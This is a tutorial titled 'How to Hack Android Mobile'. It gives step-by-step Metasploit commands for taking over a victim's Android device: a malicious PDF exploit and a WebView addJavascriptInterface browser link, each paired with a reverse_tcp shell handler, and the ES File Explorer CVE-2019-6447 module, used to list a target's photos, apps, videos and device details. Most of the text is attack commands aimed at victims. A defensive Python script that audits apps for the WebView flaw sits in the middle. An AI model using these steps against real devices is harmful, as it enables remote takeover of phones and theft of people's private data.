Exploiting Android Vulnerabilities Using Metasploit | Hacking Android Phone by Metasploit Framework | How to Hack Android Mobile

Since most people use Android, we will now learn how to exploit different vulnerabilities of the Android system by using different exploits of Metasploit:

(msfconsole)

(use exploit/android/fileformat/adobe_reader_pdf_js_interface)

Then send the (msf.pdf) file to the target; when the victim runs this file, you can get a meterpreter shell by using the following commands:

(use exploit/multi/handler)

(set PAYLOAD + payload to control) e.g. (set PAYLOAD windows/meterpreter/reverse_tcp)

(set LHOST + ip of kali Linux) e.g. (set LHOST 192.168.8.4)

(set LPORT + port to control) e.g. (set LPORT 4444)

(exploit)

(sessions -i 1)

Now you can control the Android device of your victim.

1) EXPLOITING WEBVIEW ADDJAVASCRIPTINTERFACE VULNERABILITY:

(msfconsole)

(use exploit/android/browser/webview_addjavascriptinterface)

(show payloads)

(set PAYLOAD + payload to control) e.g. (set PAYLOAD generic/shell/reverse_tcp)

(show options)

(set LHOST + ip of kali Linux) e.g. (set LHOST 192.168.8.4)

(set SRVHOST + ip of kali Linux) e.g. (set SRVHOST 192.168.0.21)

(set SRVPORT + port to control) e.g. (set SRVPORT 80)

(set URIPATH + path to control) e.g. (set URIPATH)

(exploit)

Then send the link to the victim. When the victim clicks on the link, you will get the generic shell to control the Android device of the victim.
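Seen from the defending side, the condition this module depends on can be checked in an app's own code before release. The following is an added example, not part of the original post: a static check that flags `addJavascriptInterface` registrations when the declared SDK levels leave the bridge object fully exposed. The function names, severity labels, and the sample manifest and Java source are constructed for illustration, and the check assumes the manifest text carries a `uses-sdk` element.

```python
import re

# Constructed sample inputs for illustration; not taken from any real app.
SAMPLE_MANIFEST = '''<manifest xmlns:android="http://schemas.android.com/apk/res/android">
  <uses-sdk android:minSdkVersion="14" android:targetSdkVersion="16"/>
</manifest>'''
SAMPLE_JAVA = '''public class MainActivity extends Activity {
    class Bridge {
        public String getToken() { return "t"; }
    }
    void setup(WebView w) {
        w.getSettings().setJavaScriptEnabled(true);
        w.addJavascriptInterface(new Bridge(), "bridge");
    }
}'''

SDK_RE = re.compile(r'android:(minSdkVersion|targetSdkVersion)="(\d+)"')
CALL_RE = re.compile(r'\.addJavascriptInterface\s*\(')

def sdk_levels(manifest_xml):
    """Read min/target SDK; Android defaults min to 1 and target to min."""
    found = {name: int(value) for name, value in SDK_RE.findall(manifest_xml)}
    min_sdk = found.get("minSdkVersion", 1)
    return min_sdk, found.get("targetSdkVersion", min_sdk)

def audit(manifest_xml, java_source):
    """Return (line_no, severity, reason) for each risky bridge registration."""
    min_sdk, target_sdk = sdk_levels(manifest_xml)
    if target_sdk < 17:
        # Legacy mode: the platform exposes all public methods of the object.
        verdict = ("HIGH", "targetSdkVersion < 17: all public methods of the "
                   "bridge object, inherited ones included, are callable "
                   "from page JavaScript")
    elif min_sdk < 17:
        # Devices older than Android 4.2 (API 17) ignore @JavascriptInterface.
        verdict = ("MEDIUM", "minSdkVersion < 17: devices below API 17 "
                   "expose all public methods regardless of annotations")
    else:
        return []  # only @JavascriptInterface-annotated methods are exposed
    return [(no, *verdict)
            for no, line in enumerate(java_source.splitlines(), 1)
            if CALL_RE.search(line)]

if __name__ == "__main__":
    for finding in audit(SAMPLE_MANIFEST, SAMPLE_JAVA):
        print(finding)
```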

2) EXPLOITING VULNERABILITY IN ES FILE EXPLORER OF ANDROID (CVE-2019-6447):

We can exploit it by using the following commands in Metasploit:

(msfconsole)

(use auxiliary/scanner/http/es_file_explorer_open_port)

(show options)

(set RHOSTS + ip of target) e.g. (set RHOSTS 192.168.8.4)

(run)

Now you can get the details of the target Android device by using different commands, such as:

TO SEE LIST OF HELP:

(show options)

TO SEE THE LIST OF PICTURES:

(set action LISTPICS)

(run)

TO SEE THE INSTALLED APPS OF YOUR TARGET ANDROID:

(set action LISTAPPS)

(run)

TO SEE THE LIST OF VIDEOS:

(set action LISTVIDEOS)

(run)

TO SEE THE LIST OF AUDIOS:

(set action LISTAUDIOS)

(run)

TO SEE THE DETAIL OF MOBILE:

(set action GETDEVICEINFO)

(run)

You can get more details by using the other options of this module. It is very helpful.
